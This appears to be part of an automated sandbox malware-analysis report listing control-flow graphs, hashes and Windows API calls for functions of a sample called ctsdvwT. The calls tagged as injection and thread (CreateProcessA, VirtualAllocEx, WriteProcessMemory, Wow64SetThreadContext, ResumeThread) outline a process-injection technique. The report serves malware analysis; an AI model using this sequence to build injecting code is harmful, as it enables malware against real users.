                                            control_flow_graph 617 7087934-70879d5 620 7087a0e-7087a2e 617->620 621 70879d7-70879e1 617->621 628 7087a30-7087a3a 620->628 629 7087a67-7087a96 620->629 621->620 622 70879e3-70879e5 621->622 623 7087a08-7087a0b 622->623 624 70879e7-70879f1 622->624 623->620 626 70879f3 624->626 627 70879f5-7087a04 624->627 626->627 627->627 630 7087a06 627->630 628->629 631 7087a3c-7087a3e 628->631 635 7087a98-7087aa2 629->635 636 7087acf-7087b89 CreateProcessA 629->636 630->623 633 7087a40-7087a4a 631->633 634 7087a61-7087a64 631->634 637 7087a4c 633->637 638 7087a4e-7087a5d 633->638 634->629 635->636 640 7087aa4-7087aa6 635->640 649 7087b8b-7087b91 636->649 650 7087b92-7087c18 636->650 637->638 638->638 639 7087a5f 638->639 639->634 641 7087aa8-7087ab2 640->641 642 7087ac9-7087acc 640->642 644 7087ab4 641->644 645 7087ab6-7087ac5 641->645 642->636 644->645 645->645 647 7087ac7 645->647 647->642 649->650 660 7087c28-7087c2c 650->660 661 7087c1a-7087c1e 650->661 663 7087c3c-7087c40 660->663 664 7087c2e-7087c32 660->664 661->660 662 7087c20 661->662 662->660 666 7087c50-7087c54 663->666 667 7087c42-7087c46 663->667 664->663 665 7087c34 664->665 665->663 669 7087c66-7087c6d 666->669 670 7087c56-7087c5c 666->670 667->666 668 7087c48 667->668 668->666 671 7087c6f-7087c7e 669->671 672 7087c84 669->672 670->669 671->672 674 7087c85 672->674 674->674
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07087B76
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 3688f16a80589877df717c56e7cd6c837fc8b81929aad34294e0123fa29c31c7
                                            • Instruction ID: 5d69085be1bb702a44121348e5ca71cfb3bc34e40ce0f6736f4b4068a1d5dba3
                                            • Opcode Fuzzy Hash: 3688f16a80589877df717c56e7cd6c837fc8b81929aad34294e0123fa29c31c7
                                            • Instruction Fuzzy Hash: 73A181B1D0021ACFDB64DFA8C841BEDBBF2BF44310F14866AD858A7244DB749A85CF91
                                            Function 07087940 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 675 7087940-70879d5 677 7087a0e-7087a2e 675->677 678 70879d7-70879e1 675->678 685 7087a30-7087a3a 677->685 686 7087a67-7087a96 677->686 678->677 679 70879e3-70879e5 678->679 680 7087a08-7087a0b 679->680 681 70879e7-70879f1 679->681 680->677 683 70879f3 681->683 684 70879f5-7087a04 681->684 683->684 684->684 687 7087a06 684->687 685->686 688 7087a3c-7087a3e 685->688 692 7087a98-7087aa2 686->692 693 7087acf-7087b89 CreateProcessA 686->693 687->680 690 7087a40-7087a4a 688->690 691 7087a61-7087a64 688->691 694 7087a4c 690->694 695 7087a4e-7087a5d 690->695 691->686 692->693 697 7087aa4-7087aa6 692->697 706 7087b8b-7087b91 693->706 707 7087b92-7087c18 693->707 694->695 695->695 696 7087a5f 695->696 696->691 698 7087aa8-7087ab2 697->698 699 7087ac9-7087acc 697->699 701 7087ab4 698->701 702 7087ab6-7087ac5 698->702 699->693 701->702 702->702 704 7087ac7 702->704 704->699 706->707 717 7087c28-7087c2c 707->717 718 7087c1a-7087c1e 707->718 720 7087c3c-7087c40 717->720 721 7087c2e-7087c32 717->721 718->717 719 7087c20 718->719 719->717 723 7087c50-7087c54 720->723 724 7087c42-7087c46 720->724 721->720 722 7087c34 721->722 722->720 726 7087c66-7087c6d 723->726 727 7087c56-7087c5c 723->727 724->723 725 7087c48 724->725 725->723 728 7087c6f-7087c7e 726->728 729 7087c84 726->729 727->726 728->729 731 7087c85 729->731 731->731
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07087B76
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: a3caeb41f681e6a799048ed112c6e2fb8bb0926f0b74a1ff7a8bc0a00cf4068d
                                            • Instruction ID: a6460e1dabc5ebfa0db1fa408da87d7bf27de9eb1150b1b1d4ba5e48a047532e
                                            • Opcode Fuzzy Hash: a3caeb41f681e6a799048ed112c6e2fb8bb0926f0b74a1ff7a8bc0a00cf4068d
                                            • Instruction Fuzzy Hash: 1A918FB1D0021ACFDB64DFA8C840BEDBBF2BF48310F148669D858A7244DB749A85CF91
                                            Function 012CB0E8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 732 12cb0e8-12cb0f7 733 12cb0f9-12cb106 call 12cada0 732->733 734 12cb123-12cb127 732->734 739 12cb11c 733->739 740 12cb108 733->740 735 12cb129-12cb133 734->735 736 12cb13b-12cb17c 734->736 735->736 743 12cb17e-12cb186 736->743 744 12cb189-12cb197 736->744 739->734 789 12cb10e call 12cb370 740->789 790 12cb10e call 12cb380 740->790 743->744 746 12cb199-12cb19e 744->746 747 12cb1bb-12cb1bd 744->747 745 12cb114-12cb116 745->739 748 12cb258-12cb318 745->748 750 12cb1a9 746->750 751 12cb1a0-12cb1a7 call 12cadac 746->751 749 12cb1c0-12cb1c7 747->749 782 12cb31a-12cb31d 748->782 783 12cb320-12cb34b GetModuleHandleW 748->783 754 12cb1c9-12cb1d1 749->754 755 12cb1d4-12cb1db 749->755 753 12cb1ab-12cb1b9 750->753 751->753 753->749 754->755 757 12cb1dd-12cb1e5 755->757 758 12cb1e8-12cb1f1 call 12cadbc 755->758 757->758 763 12cb1fe-12cb203 758->763 764 12cb1f3-12cb1fb 758->764 765 12cb205-12cb20c 763->765 766 12cb221-12cb225 763->766 764->763 765->766 768 12cb20e-12cb21e call 12cadcc call 12caddc 765->768 787 12cb228 call 12cb670 766->787 788 12cb228 call 12cb680 766->788 768->766 771 12cb22b-12cb22e 773 12cb230-12cb24e 771->773 774 12cb251-12cb257 771->774 773->774 782->783 784 12cb34d-12cb353 783->784 785 12cb354-12cb368 783->785 784->785 787->771 788->771 789->745 790->745
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 012CB33E
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 6890efbdb9cb4efe120c4a4b90b9b954e0031f2e396dbd365c5c10210a40da29
                                            • Instruction ID: 7151da32f9f37da57e0e1ae0ef68e2fa00542690cbd81992787479553412e4ce
                                            • Opcode Fuzzy Hash: 6890efbdb9cb4efe120c4a4b90b9b954e0031f2e396dbd365c5c10210a40da29
                                            • Instruction Fuzzy Hash: 9B716470A10B468FD724CF6AD44576ABBF1FF88740F008A2ED68AD7A40D774E949CB91
                                            Function 012C590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 012C59C9
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 12fc817d15d3c8fa95ec2b8dd0b7b3c02a2b573eecaf17c7cdc1e412e0000382
                                            • Instruction ID: cbf79827af0f743d81306d7fa982b19dd1e518f8462924ef9dd9bb90ac38bdd4
                                            • Opcode Fuzzy Hash: 12fc817d15d3c8fa95ec2b8dd0b7b3c02a2b573eecaf17c7cdc1e412e0000382
                                            • Instruction Fuzzy Hash: F04103B0D00719CEDB24CFAAC844BCEBBB5BF49704F20816AD519AB250DB75694ACF91
                                            Function 012C4514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 012C59C9
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: ff9c0e9872b8aa4bf2ef964bef72e1e03949076e6770e3b7bce6b422ba152e40
                                            • Instruction ID: 218bb5ad3412ee42fbf82b270a9fac973c9760da58bdc9d3d76128da91aa57e0
                                            • Opcode Fuzzy Hash: ff9c0e9872b8aa4bf2ef964bef72e1e03949076e6770e3b7bce6b422ba152e40
                                            • Instruction Fuzzy Hash: 664102B0D00719CBDB24CFAAC844BCEBBF5BF49704F2081AAD518AB250DB756945CF90
                                            Function 012C5A84 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6aa0987326abca4a6f5cc9be6d572f18471e08e08652cc530fd3ce7b2e90f46
                                            • Instruction ID: 782c0d8577968239b8022c851135b3478e561d7cdba941064f47bcc96822ffc9
                                            • Opcode Fuzzy Hash: e6aa0987326abca4a6f5cc9be6d572f18471e08e08652cc530fd3ce7b2e90f46
                                            • Instruction Fuzzy Hash: DE310F72D04349CFDB11CBA8C8553EEBFB0BF42714F14418EC6496B251C775A80ACB81
                                            Function 070876B0 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07087748
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 838827198a4d6ef14df76f005a9d29834c77540ac6d0fc51ee153f0dad988caa
                                            • Instruction ID: 952678fe73832b65ee54356dc73d00cbd3814cb15fc56e3fb8b798dd35458026
                                            • Opcode Fuzzy Hash: 838827198a4d6ef14df76f005a9d29834c77540ac6d0fc51ee153f0dad988caa
                                            • Instruction Fuzzy Hash: DC216BB59003099FCB10DFA9C885BEEBFF5FF48310F108829E559A7240D7789945CBA4
                                            Function 070876B8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07087748
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 35c324dd8ffdf17f0fd0ac755d7cee6a00147f625f97487ea8374d186b44ef03
                                            • Instruction ID: 8675eea3dd1f02a8ddba4a601969e4fa3543aa1db96c890825de44562435559e
                                            • Opcode Fuzzy Hash: 35c324dd8ffdf17f0fd0ac755d7cee6a00147f625f97487ea8374d186b44ef03
                                            • Instruction Fuzzy Hash: 832139B59003099FCB10DFA9C885BEEBBF5FF48310F108829E959A7240D7789944CBA4
                                            Function 070877A1 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07087828
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 043851cb418a8c0cdadb967db200973fc4fc02012c1675e4dc3dcf3008fe6905
                                            • Instruction ID: 7d7952618b6d373aa16f0189a306f69659a233bc40be9d42ded0fe28570c4350
                                            • Opcode Fuzzy Hash: 043851cb418a8c0cdadb967db200973fc4fc02012c1675e4dc3dcf3008fe6905
                                            • Instruction Fuzzy Hash: 892128B1C002499FCB10DFAAD841AEEFBF5FF48310F60882AE559A7250D7789544DBA1
                                            Function 070870E1 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07087166
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: d42da060c1485bb70b568947085fc6175f87ec8aae4769d47c37c83f48b7e9c3
                                            • Instruction ID: ae14fc06c12ed51cd7af12225c82fbb7c7d0c57cb8340f486bf739d54eb30087
                                            • Opcode Fuzzy Hash: d42da060c1485bb70b568947085fc6175f87ec8aae4769d47c37c83f48b7e9c3
                                            • Instruction Fuzzy Hash: FF2159B19002098FCB10DFAAC4857EEBFF5EF49310F108429D559A7640CB789584CFA0
                                            Function 070877A8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07087828
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 4e993504275b451c43a887de4230f746937a149c11e99049a640795840a29ba7
                                            • Instruction ID: 59b9a653e88bdd3567f94eb8b2aa6f3d59a12810664fbc984a3437b9418d84ef
                                            • Opcode Fuzzy Hash: 4e993504275b451c43a887de4230f746937a149c11e99049a640795840a29ba7
                                            • Instruction Fuzzy Hash: BC2128B1C002499FCB10DFAAC840AEEFBF5FF48310F508429E559A7250D7389540DBA1
                                            Function 070870E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07087166
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 8b16dcc0db54abb86771239ccd35d2776c17be14e955ed9fa71b057c59d3da75
                                            • Instruction ID: f1c3aa747d100e5a546e2b8f670708aba6ce064baf70542ac9c1ae8750eb6edc
                                            • Opcode Fuzzy Hash: 8b16dcc0db54abb86771239ccd35d2776c17be14e955ed9fa71b057c59d3da75
                                            • Instruction Fuzzy Hash: 632135B1D002098FDB50DFAAC8857EEBBF5EF49310F24842AD559A7340CB78A944CFA4
                                            Function 012CD5C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD64F
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: b96f0b3755faa78cd5dde8e2cca1b7c74f48b3e1d0f9fa4c608fd38593ba09e1
                                            • Instruction ID: 5f652848628c02f23eca6b0f3c012c66233b7d5745ecdfb58f632fabae9f4e98
                                            • Opcode Fuzzy Hash: b96f0b3755faa78cd5dde8e2cca1b7c74f48b3e1d0f9fa4c608fd38593ba09e1
                                            • Instruction Fuzzy Hash: 1F21E4B59002089FDB10CF9AD584ADEBFF9FB48310F14841AE918A3310D378A940CFA4
                                            Function 012CD5C1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD64F
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: e18c7ec6a9535337c58a0fe9ed9ffd07934a90a71c7cb3fd34ca4b001263dc9b
                                            • Instruction ID: 370919dc03a09cc0f507787eddf29332e018c69b3cffe73d7f04458992182137
                                            • Opcode Fuzzy Hash: e18c7ec6a9535337c58a0fe9ed9ffd07934a90a71c7cb3fd34ca4b001263dc9b
                                            • Instruction Fuzzy Hash: 4A21C2B5900209DFDB10CFA9D984ADEBBF5FB48310F14842AEA18A7350D379A954CFA4
                                            Function 070875F1 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07087666
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: bcb29acf52aed08fc3d4b195c7c8122dce2c4dd630a2c1933d735b688b5db948
                                            • Instruction ID: ae93ab2a563a589b08d6b8bdfce32397fdb35af0085abbc3cba0988582e71d02
                                            • Opcode Fuzzy Hash: bcb29acf52aed08fc3d4b195c7c8122dce2c4dd630a2c1933d735b688b5db948
                                            • Instruction Fuzzy Hash: C2116AB18002499FCB10DFAAC844AEFFFF5EF48310F208819E559A7250C735A540CFA1
                                            Function 070875F8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07087666
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 170ad10842290c49542044d25b6efef0e3e2a2b6a11b098c2b8f84281c720f27
                                            • Instruction ID: 1ef6285fc76396fb2080268e7efe392fe1b4389790fcd094af36b45ac51cd33b
                                            • Opcode Fuzzy Hash: 170ad10842290c49542044d25b6efef0e3e2a2b6a11b098c2b8f84281c720f27
                                            • Instruction Fuzzy Hash: 881137B18002499FCB10DFAAC844AEFBFF5EF48310F248819E559A7250C779A550CFA0
                                            Function 07086BF8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 7abc430ba51356e3653fde9dcefe908e28f5e7e4b618c2f992732fd3f1dc7fe0
                                            • Instruction ID: efa5f4f6a70da9bbd16393c44de76be361ae936ad9775c83b795aacc74f6c1a4
                                            • Opcode Fuzzy Hash: 7abc430ba51356e3653fde9dcefe908e28f5e7e4b618c2f992732fd3f1dc7fe0
                                            • Instruction Fuzzy Hash: 6F1149B18002488BCB10DFAAD4456EEFFF5EF48324F108819D519A7240CB79A545CBA5
                                            Function 07086C00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 59e452f2610ea199aab86a931ea5d790eb7c09fc2463ee9e238f5acdd9e804bb
                                            • Instruction ID: 8fdd028759eb57494479352cb5ca6e491c8b124d707b32c6a87b6d1a00faf0b3
                                            • Opcode Fuzzy Hash: 59e452f2610ea199aab86a931ea5d790eb7c09fc2463ee9e238f5acdd9e804bb
                                            • Instruction Fuzzy Hash: A41128B19002498BCB10DFAAC4457AEFBF5EF88314F248819D559A7240CB79A544CFA4
                                            Function 012CB2D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 012CB33E
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 1f581b33d93117493703b107da8f1e93ec18c99cad0ba32ccf93027f1579f26d
                                            • Instruction ID: 68a026d683cd5581cae6d5e11100d9f45262a4770771e2104216cf281ac70103
                                            • Opcode Fuzzy Hash: 1f581b33d93117493703b107da8f1e93ec18c99cad0ba32ccf93027f1579f26d
                                            • Instruction Fuzzy Hash: 5C1122B6C003498FDB10CF9AD444ADEFBF8EF88710F14852ADA19A7200C379A545CFA1
                                            Function 0708A7D0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0708A835
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 2066328795d439f7b428ceb83ec0022ab4456e29066016dbba62d057ce490d13
                                            • Instruction ID: b63f1793868b7d8504597e29f73e601e45a6610fc552125228812052428dcefe
                                            • Opcode Fuzzy Hash: 2066328795d439f7b428ceb83ec0022ab4456e29066016dbba62d057ce490d13
                                            • Instruction Fuzzy Hash: 0F11F2B5800349DFDB10DF9AD845BDEBFF8EB48320F10881AE558A7600C379A944CFA5
                                            Function 07088904 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0708A835
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 4a29ec0e04bfc6970723a862eb49f73d16431fdcfe239071dfae0a7b6fcc370d
                                            • Instruction ID: 41720e787eac60bc984bc2b8545ac07b0cfc6ac083310cfe7a67ebf716b9565c
                                            • Opcode Fuzzy Hash: 4a29ec0e04bfc6970723a862eb49f73d16431fdcfe239071dfae0a7b6fcc370d
                                            • Instruction Fuzzy Hash: 851106B5900349DFDB50DF99C444BDEBFF8EB49310F10885AE958A7600C375A944CFA5
                                            Function 00EDD4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d32c8f75e5f64e9789230f3d42551710fac50ee6f3823187c1a639fff76087e
                                            • Instruction ID: 28d9ec69b911dee01d706ee399fa30f602523f0e4cf691fabddc0fa1a98012b4
                                            • Opcode Fuzzy Hash: 7d32c8f75e5f64e9789230f3d42551710fac50ee6f3823187c1a639fff76087e
                                            • Instruction Fuzzy Hash: 7F21F171548240DFCB15DF14E980F26BF65FB98318F20C56AE9091A356C33AD816DBA2
                                            Function 00EDD3D8 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da0349485603d750337c9db82b41cb835353d8afdbe9cd4c8a6d0cc836287727
                                            • Instruction ID: 8ae373938ca6bd30b328ddf8ae41e7bd41cc1f0e1351487295bfd3bc599b1d6f
                                            • Opcode Fuzzy Hash: da0349485603d750337c9db82b41cb835353d8afdbe9cd4c8a6d0cc836287727
                                            • Instruction Fuzzy Hash: 0C213371108204DFCB15DF14C9C0F26BF69FB98328F20C16AE9095B356C33AE817CAA2
                                            Function 00EED01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194142655.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_eed000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f669e37c790f1a2f40983831f27f4ddbc889fdc5456c7f9d567a777cb6f03e1
                                            • Instruction ID: 2a4334b7dfd51ea332f465edc2d2c72c2c268507109f587dc480d67bbecd344e
                                            • Opcode Fuzzy Hash: 3f669e37c790f1a2f40983831f27f4ddbc889fdc5456c7f9d567a777cb6f03e1
                                            • Instruction Fuzzy Hash: 7321F571508288DFCB15DF24D984B16BF66FB84314F28C569D9095B296C33AD807CA61
                                            Function 00EED1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194142655.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_eed000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73f1e37908911882341d3f05dbb9bdb4d0aa94aed9f74ff197df511ab279648b
                                            • Instruction ID: d7c7b1a50037dcf904766408d12cae8fcd11c73434de4ddbb3a1040b8563cfe4
                                            • Opcode Fuzzy Hash: 73f1e37908911882341d3f05dbb9bdb4d0aa94aed9f74ff197df511ab279648b
                                            • Instruction Fuzzy Hash: 16213771508288DFCB05DF65D9C0F26BB65FB88318F20C56DDA095B3A6C33AD806CA61
                                            Function 00EED005 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
